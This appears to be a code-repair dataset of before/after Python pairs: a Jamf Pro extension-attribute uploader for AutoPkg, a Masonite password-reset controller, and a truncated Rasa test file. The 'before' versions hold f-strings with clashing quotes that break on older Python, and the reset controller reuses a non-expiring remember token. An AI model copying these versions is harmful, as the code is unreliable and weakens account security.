if "APBALANCEID" in header or "AWSALB" in header:
cookie = header.split()[1].rstrip(";")
self.output(f"Existing cookie found: {cookie}", verbose_level=2)
curl_cmd.extend(["--cookie", cookie])
except IOError:
self.output(
"No existing cookie found - starting new session", verbose_level=2
)
# additional headers for advanced requests
if additional_headers:
curl_cmd.extend(additional_headers)
self.output(f"curl command: {" ".join(curl_cmd)}", verbose_level=3)
# now subprocess the curl command and build the r tuple which contains the
# headers, status code and outputted data
subprocess.check_output(curl_cmd)
r = namedtuple(
"r", ["headers", "status_code", "output"], defaults=(None, None, None)
)
try:
with open(headers_file, "r") as file:
headers = file.readlines()
r.headers = [x.strip() for x in headers]
for header in r.headers: # pylint: disable=not-an-iterable
if re.match(r"HTTP/(1.1|2)", header) and "Continue" not in header:
r.status_code = int(header.split()[1])
except IOError:
raise ProcessorError(f"WARNING: {headers_file} not found")
if os.path.exists(output_file) and os.path.getsize(output_file) > 0:
with open(output_file, "rb") as file:
if "uapi" in url:
r.output = json.load(file)
else:
r.output = file.read()
else:
self.output(f"No output from request ({output_file} not found or empty)")
return r()
# do not edit directly - copy from template
def status_check(self, r, endpoint_type, obj_name):
"""Return a message dependent on the HTTP response"""
if r.status_code == 200 or r.status_code == 201:
self.output(f"{endpoint_type} '{obj_name}' uploaded successfully")
return "break"
elif r.status_code == 409:
self.output(r.output, verbose_level=2)
raise ProcessorError(
f"WARNING: {endpoint_type} '{obj_name}' upload failed due to a conflict"
)
elif r.status_code == 401:
raise ProcessorError(
f"ERROR: {endpoint_type} '{obj_name}' upload failed due to permissions error"
)
else:
self.output(f"WARNING: {endpoint_type} '{obj_name}' upload failed")
self.output(r.output, verbose_level=2)
# do not edit directly - copy from template
def get_path_to_file(self, filename):
"""AutoPkg is not very good at finding dependent files. This function
will look inside the search directories for any supplied file"""
# if the supplied file is not a path, use the override directory or
# recipe dir if no override
recipe_dir = self.env.get("RECIPE_DIR")
filepath = os.path.join(recipe_dir, filename)
if os.path.exists(filepath):
self.output(f"File found at: {filepath}")
return filepath
# if not found, search parent directories to look for it
if self.env.get("PARENT_RECIPES"):
# also look in the repos containing the parent recipes.
parent_recipe_dirs = list(
{os.path.dirname(item) for item in self.env["PARENT_RECIPES"]}
)
matched_filepath = ""
for d in parent_recipe_dirs:
# check if we are in the root of a parent repo, if not, ascend to the root
# note that if the parents are not in a git repo, only the same
# directory as the recipe will be searched for templates
if not os.path.isdir(os.path.join(d, ".git")):
d = os.path.dirname(d)
for path in Path(d).rglob(filename):
matched_filepath = str(path)
break
if matched_filepath:
self.output(f"File found at: {matched_filepath}")
return matched_filepath
# do not edit directly - copy from template
def check_api_obj_id_from_name(self, jamf_url, object_type, object_name, enc_creds):
"""check if a Classic API object with the same name exists on the server"""
# define the relationship between the object types and their URL
# we could make this shorter with some regex but I think this way is clearer
object_types = {
"package": "packages",
"computer_group": "computergroups",
"policy": "policies",
"extension_attribute": "computerextensionattributes",
}
object_list_types = {
"package": "packages",
"computer_group": "computer_groups",
"policy": "policies",
"extension_attribute": "computer_extension_attributes",
}
url = f"{jamf_url}/JSSResource/{object_types[object_type]}"
r = self.curl("GET", url, enc_creds)
if r.status_code == 200:
object_list = json.loads(r.output)
self.output(
object_list, verbose_level=4,
)
obj_id = 0
for obj in object_list[object_list_types[object_type]]:
self.output(
obj, verbose_level=3,
)
# we need to check for a case-insensitive match
if obj["name"].lower() == object_name.lower():
obj_id = obj["id"]
return obj_id
# do not edit directly - copy from template
def substitute_assignable_keys(self, data, xml_escape=False):
"""substitutes any key in the inputted text using the %MY_KEY% nomenclature"""
# do a four-pass to ensure that all keys are substituted
loop = 5
while loop > 0:
loop = loop - 1
found_keys = re.findall(r"\%\w+\%", data)
if not found_keys:
break
found_keys = [i.replace("%", "") for i in found_keys]
for found_key in found_keys:
if self.env.get(found_key):
self.output(
(
f"Replacing any instances of '{found_key}' with",
f"'{str(self.env.get(found_key))}'",
),
verbose_level=2,
)
if xml_escape:
replacement_key = escape(self.env.get(found_key))
else:
replacement_key = self.env.get(found_key)
data = data.replace(f"%{found_key}%", replacement_key)
else:
self.output(f"WARNING: '{found_key}' has no replacement object!",)
raise ProcessorError("Unsubstitutable key in template found")
return data
def upload_ea(
self, jamf_url, enc_creds, ea_name, script_path, obj_id=None,
):
"""Update extension attribute metadata."""
# import script from file and replace any keys in the script
if os.path.exists(script_path):
with open(script_path, "r") as file:
script_contents = file.read()
else:
raise ProcessorError("Script does not exist!")
# substitute user-assignable keys
script_contents = self.substitute_assignable_keys(script_contents)
# XML-escape the script
script_contents_escaped = escape(script_contents)
# build the object
ea_data = (
"<computer_extension_attribute>"
+ "<name>{}</name>".format(ea_name)
+ "<enabled>true</enabled>"
+ "<description/>"
+ "<data_type>String</data_type>"
+ "<input_type>"
+ " <type>script</type>"
+ " <platform>Mac</platform>"
+ " <script>{}</script>".format(script_contents_escaped)
+ "</input_type>"
+ "<inventory_display>Extension Attributes</inventory_display>"
+ "<recon_display>Extension Attributes</recon_display>"
+ "</computer_extension_attribute>"
)
# if we find an object ID we put, if not, we post
if obj_id:
url = "{}/JSSResource/computerextensionattributes/id/{}".format(
jamf_url, obj_id
)
else:
url = "{}/JSSResource/computerextensionattributes/id/0".format(jamf_url)
self.output(
"Extension Attribute data:", verbose_level=2,
)
self.output(
ea_data, verbose_level=2,
)
self.output("Uploading Extension Attribute..")
# write the template to temp file
template_xml = self.write_temp_file(ea_data)
count = 0
while True:
count += 1
self.output(
"Extension Attribute upload attempt {}".format(count), verbose_level=2,
)
method = "PUT" if obj_id else "POST"
r = self.curl(method, url, enc_creds, template_xml)
# check HTTP response
if self.status_check(r, "Extension Attribute", ea_name) == "break":
break
if count > 5:
self.output(
"ERROR: Extension Attribute upload did not succeed after 5 attempts"
)
self.output("\nHTTP POST Response Code: {}".format(r.status_code))
raise ProcessorError("ERROR: Extension Attribute upload failed ")
sleep(10)
# clean up temp files
self.clear_tmp_dir()
def main(self):
"""Do the main thing here"""
self.jamf_url = self.env.get("JSS_URL")
self.jamf_user = self.env.get("API_USERNAME")
self.jamf_password = self.env.get("API_PASSWORD")
self.ea_script_path = self.env.get("ea_script_path")
self.ea_name = self.env.get("ea_name")
self.replace = self.env.get("replace_ea")
# handle setting replace in overrides
if not self.replace or self.replace == "False":
self.replace = False
# clear any pre-existing summary result
if "jamfextensionattributeuploader_summary_result" in self.env:
del self.env["jamfextensionattributeuploader_summary_result"]
ea_uploaded = False
# encode the username and password into a basic auth b64 encoded string
credentials = f"{self.jamf_user}:{self.jamf_password}"
enc_creds_bytes = b64encode(credentials.encode("utf-8"))
enc_creds = str(enc_creds_bytes, "utf-8")
# handle files with no path
if "/" not in self.ea_script_path:
found_template = self.get_path_to_file(self.ea_script_path)
if found_template:
self.ea_script_path = found_template
else:
raise ProcessorError(f"ERROR: EA file {self.ea_script_path} not found")
# now start the process of uploading the object
self.output(f"Checking for existing '{self.ea_name}' on {self.jamf_url}")
# check for existing - requires obj_name
obj_type = "extension_attribute"
obj_id = self.check_api_obj_id_from_name(
self.jamf_url, obj_type, self.ea_name, enc_creds
)
if obj_id:
self.output(
"Extension Attribute '{}' already exists: ID {}".format(
self.ea_name, obj_id
)
)
if self.replace:
self.output(
"Replacing existing Extension Attribute as 'replace_ea' is set to {}".format(
self.replace
),
verbose_level=1,
)
self.upload_ea(
self.jamf_url, enc_creds, self.ea_name, self.ea_script_path, obj_id,
)
ea_uploaded = True
else:
self.output(
"Not replacing existing Extension Attribute. Use replace_ea='True' to enforce.",
verbose_level=1,
)
return
else:
# post the item
self.upload_ea(
self.jamf_url, enc_creds, self.ea_name, self.ea_script_path,
)
ea_uploaded = True
# output the summary
self.env["extension_attribute"] = self.ea_name
self.env["ea_uploaded"] = ea_uploaded
if ea_uploaded:
self.env["jamfextensionattributeuploader_summary_result"] = {
"summary_text": (
"The following extension attributes were created or "
"updated in Jamf Pro:"
),
"report_fields": ["name", "path"],
"data": {"name": self.ea_name, "path": self.ea_script_path},
}
if __name__ == "__main__":
PROCESSOR = JamfExtensionAttributeUploader()
PROCESSOR.execute_shell()
| #!/usr/local/autopkg/python
"""
JamfExtensionAttributeUploader processor for uploading extension attributes
to Jamf Pro using AutoPkg
by G Pugh
"""
import json
import re
import os
import subprocess
import uuid
from collections import namedtuple
from base64 import b64encode
from pathlib import Path
from shutil import rmtree
from time import sleep
from xml.sax.saxutils import escape
from autopkglib import Processor, ProcessorError # pylint: disable=import-error
class JamfExtensionAttributeUploader(Processor):
"""A processor for AutoPkg that will upload an item to a Jamf Cloud or on-prem server."""
input_variables = {
"JSS_URL": {
"required": True,
"description": "URL to a Jamf Pro server that the API user has write access "
"to, optionally set as a key in the com.github.autopkg "
"preference file.",
},
"API_USERNAME": {
"required": True,
"description": "Username of account with appropriate access to "
"jss, optionally set as a key in the com.github.autopkg "
"preference file.",
},
"API_PASSWORD": {
"required": True,
"description": "Password of api user, optionally set as a key in "
"the com.github.autopkg preference file.",
},
"ea_name": {
"required": False,
"description": "Extension Attribute name",
"default": "",
},
"ea_script_path": {
"required": False,
"description": "Full path to the script to be uploaded",
},
"replace_ea": {
"required": False,
"description": "Overwrite an existing category if True.",
"default": False,
},
}
output_variables = {
"jamfextensionattributeuploader_summary_result": {
"description": "Description of interesting results.",
},
}
# do not edit directly - copy from template
def write_json_file(self, data, tmp_dir="/tmp/jamf_upload"):
"""dump some json to a temporary file"""
self.make_tmp_dir(tmp_dir)
tf = os.path.join(tmp_dir, f"jamf_upload_{str(uuid.uuid4())}.json")
with open(tf, "w") as fp:
json.dump(data, fp)
return tf
# do not edit directly - copy from template
def write_temp_file(self, data, tmp_dir="/tmp/jamf_upload"):
"""dump some text to a temporary file"""
self.make_tmp_dir(tmp_dir)
tf = os.path.join(tmp_dir, f"jamf_upload_{str(uuid.uuid4())}.txt")
with open(tf, "w") as fp:
fp.write(data)
return tf
# do not edit directly - copy from template
def make_tmp_dir(self, tmp_dir="/tmp/jamf_upload"):
"""make the tmp directory"""
if not os.path.exists(tmp_dir):
os.mkdir(tmp_dir)
return tmp_dir
# do not edit directly - copy from template
def clear_tmp_dir(self, tmp_dir="/tmp/jamf_upload"):
"""remove the tmp directory"""
if os.path.exists(tmp_dir):
rmtree(tmp_dir)
return tmp_dir
# do not edit directly - copy from template
def curl(self, method, url, auth, data="", additional_headers=""):
"""
build a curl command based on method (GET, PUT, POST, DELETE)
If the URL contains 'uapi' then token should be passed to the auth variable,
otherwise the enc_creds variable should be passed to the auth variable
"""
tmp_dir = self.make_tmp_dir()
headers_file = os.path.join(tmp_dir, "curl_headers_from_jamf_upload.txt")
output_file = os.path.join(tmp_dir, "curl_output_from_jamf_upload.txt")
cookie_jar = os.path.join(tmp_dir, "curl_cookies_from_jamf_upload.txt")
# build the curl command
curl_cmd = [
"/usr/bin/curl",
"--silent",
"--show-error",
"-X",
method,
"-D",
headers_file,
"--output",
output_file,
url,
]
# authorisation if using Jamf Pro API or Classic API
# if using uapi and we already have a token then we use the token for authorization
if "uapi" in url and "tokens" not in url:
curl_cmd.extend(["--header", f"authorization: Bearer {auth}"])
# basic auth to obtain a token, or for classic API
elif "uapi" in url or "JSSResource" in url or "dbfileupload" in url:
curl_cmd.extend(["--header", f"authorization: Basic {auth}"])
# set either Accept or Content-Type depending on method
if method == "GET" or method == "DELETE":
curl_cmd.extend(["--header", "Accept: application/json"])
# icon upload requires special method
elif method == "POST" and "fileuploads" in url:
curl_cmd.extend(["--header", "Content-type: multipart/form-data"])
curl_cmd.extend(["--form", f"name=@{data}"])
elif method == "POST" or method == "PUT":
if data:
if "uapi" in url or "JSSResource" in url or "dbfileupload" in url:
# jamf data upload requires upload-file argument
curl_cmd.extend(["--upload-file", data])
else:
# slack requires data argument
curl_cmd.extend(["--data", data])
# uapi and slack accepts json, classic API only accepts xml
if "JSSResource" in url:
curl_cmd.extend(["--header", "Content-type: application/xml"])
else:
curl_cmd.extend(["--header", "Content-type: application/json"])
else:
self.output(f"WARNING: HTTP method {method} not supported")
# write session for jamf requests
if "uapi" in url or "JSSResource" in url or "dbfileupload" in url:
try:
with open(headers_file, "r") as file:
headers = file.readlines()
existing_headers = [x.strip() for x in headers]
for header in existing_headers:
if "APBALANCEID" in header or "AWSALB" in header:
with open(cookie_jar, "w") as fp:
fp.write(header)
except IOError:
pass
# look for existing session
try:
with open(cookie_jar, "r") as file:
headers = file.readlines()
existing_headers = [x.strip() for x in headers]
for header in existing_headers:
if "APBALANCEID" in header or "AWSALB" in header:
cookie = header.split()[1].rstrip(";")
self.output(f"Existing cookie found: {cookie}", verbose_level=2)
curl_cmd.extend(["--cookie", cookie])
except IOError:
self.output(
"No existing cookie found - starting new session", verbose_level=2
)
# additional headers for advanced requests
if additional_headers:
curl_cmd.extend(additional_headers)
self.output(f"curl command: {' '.join(curl_cmd)}", verbose_level=3)
# now subprocess the curl command and build the r tuple which contains the
# headers, status code and outputted data
subprocess.check_output(curl_cmd)
r = namedtuple(
"r", ["headers", "status_code", "output"], defaults=(None, None, None)
)
try:
with open(headers_file, "r") as file:
headers = file.readlines()
r.headers = [x.strip() for x in headers]
for header in r.headers: # pylint: disable=not-an-iterable
if re.match(r"HTTP/(1.1|2)", header) and "Continue" not in header:
r.status_code = int(header.split()[1])
except IOError:
raise ProcessorError(f"WARNING: {headers_file} not found")
if os.path.exists(output_file) and os.path.getsize(output_file) > 0:
with open(output_file, "rb") as file:
if "uapi" in url:
r.output = json.load(file)
else:
r.output = file.read()
else:
self.output(f"No output from request ({output_file} not found or empty)")
return r()
# do not edit directly - copy from template
def status_check(self, r, endpoint_type, obj_name):
"""Return a message dependent on the HTTP response"""
if r.status_code == 200 or r.status_code == 201:
self.output(f"{endpoint_type} '{obj_name}' uploaded successfully")
return "break"
elif r.status_code == 409:
self.output(r.output, verbose_level=2)
raise ProcessorError(
f"WARNING: {endpoint_type} '{obj_name}' upload failed due to a conflict"
)
elif r.status_code == 401:
raise ProcessorError(
f"ERROR: {endpoint_type} '{obj_name}' upload failed due to permissions error"
)
else:
self.output(f"WARNING: {endpoint_type} '{obj_name}' upload failed")
self.output(r.output, verbose_level=2)
# do not edit directly - copy from template
def get_path_to_file(self, filename):
"""AutoPkg is not very good at finding dependent files. This function
will look inside the search directories for any supplied file"""
# if the supplied file is not a path, use the override directory or
# recipe dir if no override
recipe_dir = self.env.get("RECIPE_DIR")
filepath = os.path.join(recipe_dir, filename)
if os.path.exists(filepath):
self.output(f"File found at: {filepath}")
return filepath
# if not found, search parent directories to look for it
if self.env.get("PARENT_RECIPES"):
# also look in the repos containing the parent recipes.
parent_recipe_dirs = list(
{os.path.dirname(item) for item in self.env["PARENT_RECIPES"]}
)
matched_filepath = ""
for d in parent_recipe_dirs:
# check if we are in the root of a parent repo, if not, ascend to the root
# note that if the parents are not in a git repo, only the same
# directory as the recipe will be searched for templates
if not os.path.isdir(os.path.join(d, ".git")):
d = os.path.dirname(d)
for path in Path(d).rglob(filename):
matched_filepath = str(path)
break
if matched_filepath:
self.output(f"File found at: {matched_filepath}")
return matched_filepath
# do not edit directly - copy from template
def check_api_obj_id_from_name(self, jamf_url, object_type, object_name, enc_creds):
"""check if a Classic API object with the same name exists on the server"""
# define the relationship between the object types and their URL
# we could make this shorter with some regex but I think this way is clearer
object_types = {
"package": "packages",
"computer_group": "computergroups",
"policy": "policies",
"extension_attribute": "computerextensionattributes",
}
object_list_types = {
"package": "packages",
"computer_group": "computer_groups",
"policy": "policies",
"extension_attribute": "computer_extension_attributes",
}
url = f"{jamf_url}/JSSResource/{object_types[object_type]}"
r = self.curl("GET", url, enc_creds)
if r.status_code == 200:
object_list = json.loads(r.output)
self.output(
object_list, verbose_level=4,
)
obj_id = 0
for obj in object_list[object_list_types[object_type]]:
self.output(
obj, verbose_level=3,
)
# we need to check for a case-insensitive match
if obj["name"].lower() == object_name.lower():
obj_id = obj["id"]
return obj_id
# do not edit directly - copy from template
def substitute_assignable_keys(self, data, xml_escape=False):
"""substitutes any key in the inputted text using the %MY_KEY% nomenclature"""
# do a four-pass to ensure that all keys are substituted
loop = 5
while loop > 0:
loop = loop - 1
found_keys = re.findall(r"\%\w+\%", data)
if not found_keys:
break
found_keys = [i.replace("%", "") for i in found_keys]
for found_key in found_keys:
if self.env.get(found_key):
self.output(
(
f"Replacing any instances of '{found_key}' with",
f"'{str(self.env.get(found_key))}'",
),
verbose_level=2,
)
if xml_escape:
replacement_key = escape(self.env.get(found_key))
else:
replacement_key = self.env.get(found_key)
data = data.replace(f"%{found_key}%", replacement_key)
else:
self.output(f"WARNING: '{found_key}' has no replacement object!",)
raise ProcessorError("Unsubstitutable key in template found")
return data
def upload_ea(
self, jamf_url, enc_creds, ea_name, script_path, obj_id=None,
):
"""Update extension attribute metadata."""
# import script from file and replace any keys in the script
if os.path.exists(script_path):
with open(script_path, "r") as file:
script_contents = file.read()
else:
raise ProcessorError("Script does not exist!")
# substitute user-assignable keys
script_contents = self.substitute_assignable_keys(script_contents)
# XML-escape the script
script_contents_escaped = escape(script_contents)
# build the object
ea_data = (
"<computer_extension_attribute>"
+ "<name>{}</name>".format(ea_name)
+ "<enabled>true</enabled>"
+ "<description/>"
+ "<data_type>String</data_type>"
+ "<input_type>"
+ " <type>script</type>"
+ " <platform>Mac</platform>"
+ " <script>{}</script>".format(script_contents_escaped)
+ "</input_type>"
+ "<inventory_display>Extension Attributes</inventory_display>"
+ "<recon_display>Extension Attributes</recon_display>"
+ "</computer_extension_attribute>"
)
# if we find an object ID we put, if not, we post
if obj_id:
url = "{}/JSSResource/computerextensionattributes/id/{}".format(
jamf_url, obj_id
)
else:
url = "{}/JSSResource/computerextensionattributes/id/0".format(jamf_url)
self.output(
"Extension Attribute data:", verbose_level=2,
)
self.output(
ea_data, verbose_level=2,
)
self.output("Uploading Extension Attribute..")
# write the template to temp file
template_xml = self.write_temp_file(ea_data)
count = 0
while True:
count += 1
self.output(
"Extension Attribute upload attempt {}".format(count), verbose_level=2,
)
method = "PUT" if obj_id else "POST"
r = self.curl(method, url, enc_creds, template_xml)
# check HTTP response
if self.status_check(r, "Extension Attribute", ea_name) == "break":
break
if count > 5:
self.output(
"ERROR: Extension Attribute upload did not succeed after 5 attempts"
)
self.output("\nHTTP POST Response Code: {}".format(r.status_code))
raise ProcessorError("ERROR: Extension Attribute upload failed ")
sleep(10)
# clean up temp files
self.clear_tmp_dir()
def main(self):
"""Do the main thing here"""
self.jamf_url = self.env.get("JSS_URL")
self.jamf_user = self.env.get("API_USERNAME")
self.jamf_password = self.env.get("API_PASSWORD")
self.ea_script_path = self.env.get("ea_script_path")
self.ea_name = self.env.get("ea_name")
self.replace = self.env.get("replace_ea")
# handle setting replace in overrides
if not self.replace or self.replace == "False":
self.replace = False
# clear any pre-existing summary result
if "jamfextensionattributeuploader_summary_result" in self.env:
del self.env["jamfextensionattributeuploader_summary_result"]
ea_uploaded = False
# encode the username and password into a basic auth b64 encoded string
credentials = f"{self.jamf_user}:{self.jamf_password}"
enc_creds_bytes = b64encode(credentials.encode("utf-8"))
enc_creds = str(enc_creds_bytes, "utf-8")
# handle files with no path
if "/" not in self.ea_script_path:
found_template = self.get_path_to_file(self.ea_script_path)
if found_template:
self.ea_script_path = found_template
else:
raise ProcessorError(f"ERROR: EA file {self.ea_script_path} not found")
# now start the process of uploading the object
self.output(f"Checking for existing '{self.ea_name}' on {self.jamf_url}")
# check for existing - requires obj_name
obj_type = "extension_attribute"
obj_id = self.check_api_obj_id_from_name(
self.jamf_url, obj_type, self.ea_name, enc_creds
)
if obj_id:
self.output(
"Extension Attribute '{}' already exists: ID {}".format(
self.ea_name, obj_id
)
)
if self.replace:
self.output(
"Replacing existing Extension Attribute as 'replace_ea' is set to {}".format(
self.replace
),
verbose_level=1,
)
self.upload_ea(
self.jamf_url, enc_creds, self.ea_name, self.ea_script_path, obj_id,
)
ea_uploaded = True
else:
self.output(
"Not replacing existing Extension Attribute. Use replace_ea='True' to enforce.",
verbose_level=1,
)
return
else:
# post the item
self.upload_ea(
self.jamf_url, enc_creds, self.ea_name, self.ea_script_path,
)
ea_uploaded = True
# output the summary
self.env["extension_attribute"] = self.ea_name
self.env["ea_uploaded"] = ea_uploaded
if ea_uploaded:
self.env["jamfextensionattributeuploader_summary_result"] = {
"summary_text": (
"The following extension attributes were created or "
"updated in Jamf Pro:"
),
"report_fields": ["name", "path"],
"data": {"name": self.ea_name, "path": self.ea_script_path},
}
if __name__ == "__main__":
PROCESSOR = JamfExtensionAttributeUploader()
PROCESSOR.execute_shell()
|
"""A PasswordController Module."""
import uuid
from masonite import env, Mail, Session
from masonite.auth import Auth
from masonite.helpers import config, password as bcrypt_password
from masonite.request import Request
from masonite.view import View
from masonite.validation import Validator
from config.auth import AUTH
class PasswordController:
"""Password Controller."""
def forget(self, view: View, auth: Auth):
return view.render("auth/forget", {"app": config("application"), "Auth": auth})
def reset(self, view: View, request: Request, auth: Auth):
token = request.param("token")
user = AUTH["guards"]["web"]["model"].where("remember_token", token).first()
if user:
return view.render(
"auth/reset",
{"token": token, "app": config("application"), "Auth": auth},
)
def send(self, request: Request, session: Session, mail: Mail, validate: Validator):
print(f' session email: {request.session.get('email')}')
errors = request.validate(
validate.required("email"),
validate.email("email", messages={'email': "Emailová adresa nie je platná"})
)
print(f' errors: {errors}')
if errors:
return request.back().with_errors(errors)
email = request.input("email")
user = AUTH["guards"]["web"]["model"].where("email", email).first()
if user:
if not user.remember_token:
user.remember_token = str(uuid.uuid4())
user.save()
message = "Prosím, kliknite na {}/password/{}/reset pre zresetovanie hesla".format(
env("APP_URL"), user.remember_token
)
link = "{}/password/{}/reset".format(
env("APP_URL"), user.remember_token)
# mail.subject("Inštrukcie pre zresetovanie hesla").to(user.email).send(message)
mail.to(user.email).template(
"email/password_reset", {"name": user.name, "email": user.email, "link": link}
).subject("Inštrukcie pre zresetovanie hesla").send()
session.flash(
"success",
#"If we found that email in our system then the email has been sent. Please follow the instructions in the email to reset your password.",
"Ak emailová adresa existuje v našom systéme, email bol odoslaný."
"Pre resetovanie hesla prosím postupujte podľa inštrukcií uvedených v emaili."
)
return request.redirect("/password")
def update(self, request: Request, validate: Validator):
errors = request.validate(
validate.required("password"),
# TODO: only available in masonite latest versions (which are not compatible with Masonite 2.2)
validate.strong(
"password",
length=8,
special=1,
uppercase=1,
# breach=True checks if the password has been breached before.
# Requires 'pip install pwnedapi'
breach=False,
messages={
'password': 'Heslo musí obsahovať minimálne 8 znakov, jeden špeciálny znak, jedno veľké písmeno a dve číslice'
}
),
)
if errors:
return request.back().with_errors(errors)
user = (
AUTH["guards"]["web"]["model"]
.where("remember_token", request.param("token"))
.first()
)
if user:
user.password = bcrypt_password(request.input("password"))
user.save()
return request.redirect("/login")
| """A PasswordController Module."""
import uuid
from masonite import env, Mail, Session
from masonite.auth import Auth
from masonite.helpers import config, password as bcrypt_password
from masonite.request import Request
from masonite.view import View
from masonite.validation import Validator
from config.auth import AUTH
class PasswordController:
"""Password Controller."""
def forget(self, view: View, auth: Auth):
return view.render("auth/forget", {"app": config("application"), "Auth": auth})
def reset(self, view: View, request: Request, auth: Auth):
token = request.param("token")
user = AUTH["guards"]["web"]["model"].where("remember_token", token).first()
if user:
return view.render(
"auth/reset",
{"token": token, "app": config("application"), "Auth": auth},
)
def send(self, request: Request, session: Session, mail: Mail, validate: Validator):
print(f' session email: {request.session.get("email")}')
errors = request.validate(
validate.required("email"),
validate.email("email", messages={'email': "Emailová adresa nie je platná"})
)
print(f' errors: {errors}')
if errors:
return request.back().with_errors(errors)
email = request.input("email")
user = AUTH["guards"]["web"]["model"].where("email", email).first()
if user:
if not user.remember_token:
user.remember_token = str(uuid.uuid4())
user.save()
message = "Prosím, kliknite na {}/password/{}/reset pre zresetovanie hesla".format(
env("APP_URL"), user.remember_token
)
link = "{}/password/{}/reset".format(
env("APP_URL"), user.remember_token)
# mail.subject("Inštrukcie pre zresetovanie hesla").to(user.email).send(message)
mail.to(user.email).template(
"email/password_reset", {"name": user.name, "email": user.email, "link": link}
).subject("Inštrukcie pre zresetovanie hesla").send()
session.flash(
"success",
#"If we found that email in our system then the email has been sent. Please follow the instructions in the email to reset your password.",
"Ak emailová adresa existuje v našom systéme, email bol odoslaný."
"Pre resetovanie hesla prosím postupujte podľa inštrukcií uvedených v emaili."
)
return request.redirect("/password")
def update(self, request: Request, validate: Validator):
errors = request.validate(
validate.required("password"),
# TODO: only available in masonite latest versions (which are not compatible with Masonite 2.2)
validate.strong(
"password",
length=8,
special=1,
uppercase=1,
# breach=True checks if the password has been breached before.
# Requires 'pip install pwnedapi'
breach=False,
messages={
'password': 'Heslo musí obsahovať minimálne 8 znakov, jeden špeciálny znak, jedno veľké písmeno a dve číslice'
}
),
)
if errors:
return request.back().with_errors(errors)
user = (
AUTH["guards"]["web"]["model"]
.where("remember_token", request.param("token"))
.first()
)
if user:
user.password = bcrypt_password(request.input("password"))
user.save()
return request.redirect("/login")
|
import os
from pathlib import Path
import json
import logging
from typing import Any, Text, Dict
import pytest
import rasa.shared.utils.io
import rasa.utils.io
from rasa.core.test import (
_create_data_generator,
_collect_story_predictions,
test as evaluate_stories,
FAILED_STORIES_FILE,
CONFUSION_MATRIX_STORIES_FILE,
REPORT_STORIES_FILE,
SUCCESSFUL_STORIES_FILE,
_clean_entity_results,
)
from rasa.core.policies.memoization import MemoizationPolicy
# we need this import to ignore the warning...
# noinspection PyUnresolvedReferences
from rasa.nlu.test import evaluate_entities, run_evaluation
from rasa.core.agent import Agent
from tests.core.conftest import (
DEFAULT_STORIES_FILE,
E2E_STORY_FILE_UNKNOWN_ENTITY,
END_TO_END_STORY_FILE,
E2E_STORY_FILE_TRIPS_CIRCUIT_BREAKER,
STORY_FILE_TRIPS_CIRCUIT_BREAKER,
)
async def test_evaluation_file_creation(tmpdir: Path, default_agent: Agent):
failed_stories_path = str(tmpdir / FAILED_STORIES_FILE)
success_stories_path = str(tmpdir / SUCCESSFUL_STORIES_FILE)
report_path = str(tmpdir / REPORT_STORIES_FILE)
confusion_matrix_path = str(tmpdir / CONFUSION_MATRIX_STORIES_FILE)
await evaluate_stories(
stories=DEFAULT_STORIES_FILE,
agent=default_agent,
out_directory=str(tmpdir),
max_stories=None,
e2e=False,
errors=True,
successes=True,
)
assert os.path.isfile(failed_stories_path)
assert os.path.isfile(success_stories_path)
assert os.path.isfile(report_path)
assert os.path.isfile(confusion_matrix_path)
async def test_end_to_end_evaluation_script(default_agent: Agent):
generator = await _create_data_generator(
END_TO_END_STORY_FILE, default_agent, use_e2e=True
)
completed_trackers = generator.generate_story_trackers()
story_evaluation, num_stories, _ = await _collect_story_predictions(
completed_trackers, default_agent, use_e2e=True
)
serialised_store = [
"utter_greet",
"action_listen",
"utter_greet",
"action_listen",
"utter_default",
"action_listen",
"utter_goodbye",
"action_listen",
"utter_greet",
"action_listen",
"utter_default",
"action_listen",
"greet",
"greet",
"default",
"goodbye",
"greet",
"default",
'[{"name": "Max"}]{"entity": "name", "value": "Max"}',
]
assert story_evaluation.evaluation_store.serialise()[0] == serialised_store
assert not story_evaluation.evaluation_store.has_prediction_target_mismatch()
assert len(story_evaluation.failed_stories) == 0
assert num_stories == 3
async def test_end_to_end_evaluation_script_unknown_entity(default_agent: Agent):
generator = await _create_data_generator(
E2E_STORY_FILE_UNKNOWN_ENTITY, default_agent, use_e2e=True
)
completed_trackers = generator.generate_story_trackers()
story_evaluation, num_stories, _ = await _collect_story_predictions(
completed_trackers, default_agent, use_e2e=True
)
assert story_evaluation.evaluation_store.has_prediction_target_mismatch()
assert len(story_evaluation.failed_stories) == 1
assert num_stories == 1
@pytest.mark.timeout(300)
async def test_end_to_evaluation_with_forms(form_bot_agent: Agent):
generator = await _create_data_generator(
"data/test_evaluations/form_end_to_end_stories.yml",
form_bot_agent,
use_e2e=True,
)
test_stories = generator.generate_story_trackers()
story_evaluation, num_stories, _ = await _collect_story_predictions(
test_stories, form_bot_agent, use_e2e=True
)
assert not story_evaluation.evaluation_store.has_prediction_target_mismatch()
async def test_source_in_failed_stories(tmpdir: Path, default_agent: Agent):
stories_path = str(tmpdir / FAILED_STORIES_FILE)
await evaluate_stories(
stories=E2E_STORY_FILE_UNKNOWN_ENTITY,
agent=default_agent,
out_directory=str(tmpdir),
max_stories=None,
e2e=False,
)
story_file_unknown_entity = Path(E2E_STORY_FILE_UNKNOWN_ENTITY).absolute()
failed_stories = rasa.shared.utils.io.read_file(stories_path)
assert (
f"story: simple_story_with_unknown_entity ({story_file_unknown_entity})"
in failed_stories
)
async def test_end_to_evaluation_trips_circuit_breaker():
agent = Agent(
domain="data/test_domains/default.yml",
policies=[MemoizationPolicy(max_history=11)],
)
training_data = await agent.load_data(STORY_FILE_TRIPS_CIRCUIT_BREAKER)
agent.train(training_data)
generator = await _create_data_generator(
E2E_STORY_FILE_TRIPS_CIRCUIT_BREAKER, agent, use_e2e=True
)
test_stories = generator.generate_story_trackers()
story_evaluation, num_stories, _ = await _collect_story_predictions(
test_stories, agent, use_e2e=True
)
circuit_trip_predicted = [
"utter_greet",
"utter_greet",
"utter_greet",
"utter_greet",
"utter_greet",
"utter_greet",
"utter_greet",
"utter_greet",
"utter_greet",
"utter_greet",
"circuit breaker tripped",
"circuit breaker tripped",
]
assert (
story_evaluation.evaluation_store.action_predictions == circuit_trip_predicted
)
assert num_stories == 1
@pytest.mark.parametrize(
"text, entity, expected_entity",
[
(
"The first one please.",
{
"extractor": "DucklingEntityExtractor",
"entity": "ordinal",
"confidence": 0.87,
"start": 4,
"end": 9,
"value": 1,
},
{
"text": "The first one please.",
"entity": "ordinal",
"start": 4,
"end": 9,
"value": "1",
},
),
(
"The first one please.",
{
"extractor": "CRFEntityExtractor",
"entity": "ordinal",
